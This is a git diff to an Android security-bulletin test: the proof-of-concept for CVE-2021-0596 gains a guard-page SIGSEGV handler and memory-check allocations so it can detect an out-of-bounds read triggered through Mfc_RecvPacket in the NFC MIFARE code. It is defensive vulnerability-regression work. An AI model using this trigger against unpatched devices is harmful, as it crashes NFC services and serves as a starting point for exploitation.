1 files changed, 33 insertions, 4 deletions

diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
index 9b250044e38..3b1a58014a3 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0596/poc.cpp
@@ -15,21 +15,50 @@
  *
  */
 
+#include <unistd.h>
 #include "phNxpExtns_MifareStd.h"
+#include "../includes/common.h"
+#include "../includes/memutils.h"
 
+char enable_selective_overload = ENABLE_NONE;
+char *vulnPtr = nullptr;
+bool testInProgress = false;
+struct sigaction new_action, old_action;
+void sigsegv_handler(int signum, siginfo_t *info, void* context) {
+    if (testInProgress && info->si_signo == SIGSEGV) {
+        size_t pageSize = getpagesize();
+        if (pageSize) {
+            char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) - pageSize;
+            char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK);
+            if (faultPage == vulnPtrGuardPage) {
+                (*old_action.sa_sigaction)(signum, info, context);
+                return;
+            }
+        }
+    }
+    _exit(EXIT_FAILURE);
+}
 uint8_t NFC_GetNCIVersion() {
     return NCI_VERSION_2_0;
 }
 
 int main() {
-    uint8_t *buffer = (uint8_t*) malloc(16 * sizeof(uint8_t));
-    if (buffer == nullptr) {
-        return EXIT_FAILURE;
-    }
+    sigemptyset(&new_action.sa_mask);
+    new_action.sa_flags = SA_SIGINFO;
+    new_action.sa_sigaction = sigsegv_handler;
+    sigaction(SIGSEGV, &new_action, &old_action);
+    enable_selective_overload = ENABLE_MEMALIGN_CHECK;
+    uint8_t *buffer = (uint8_t*) memalign(16, 16 * sizeof(uint8_t));
+    enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
+    FAIL_CHECK(buffer);
+
+    vulnPtr = (char *) buffer;
     uint8_t bufferSize = 1;
     buffer[0] = 0x10;
     phNxpExtns_MfcModuleInit();
+    testInProgress = true;
     Mfc_RecvPacket(buffer, bufferSize);
+    testInProgress = false;
     free(buffer);
     return EXIT_SUCCESS;
 }